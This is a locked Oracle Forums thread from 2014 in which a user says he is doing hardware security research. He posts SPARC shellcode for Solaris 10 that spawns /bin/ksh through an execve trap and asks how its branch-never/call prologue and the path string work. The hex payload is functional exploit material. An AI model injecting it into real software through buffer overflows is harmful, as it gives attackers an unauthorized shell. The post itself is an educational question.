Infrastructure Software

Announcement

For appeals, questions and feedback about Oracle Forums, please email oracle-forums-moderators_us@oracle.com. Technical questions should be asked in the appropriate category. Thank you!

buffer overflow attack in Solaris 10/SPARC

RexChanApr 12 2014

Hi all， I am doing a hardware security research and using a shellcode of sparc CPU as shown below:

"\x20\xbf\xff\xff" /* bn,a */

"\x7f\xff\xff\xff" /* call */

"\x90\x03\xe0\x20" /* add %o7,32,%o0 */

"\x92\x02\x20\x10" /* add %o0,16,%o1 */

"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */

"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */

"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */

"\x82\x10\x20\x0b" /* mov 0x0b,%g1 */

"\x91\xd0\x20\x08" /* ta 8 */

"/bin/ksh" ;

I know when doing the system call, we need :

1: Arguments in output registers

2: System call number in %g1

3: Trap 8

My questions are, what's the purpose of the BN(branch never) and CALL instruction in the beginning?

Why does it put /bin/ksh in the last line, which part of/how does the program utilize this path? Thank you !

Locked Post

New comments cannot be posted to this locked post.

Locked on May 10 2014

Added on Apr 12 2014

#kernel, #oracle-solaris

0 comments

1,158 views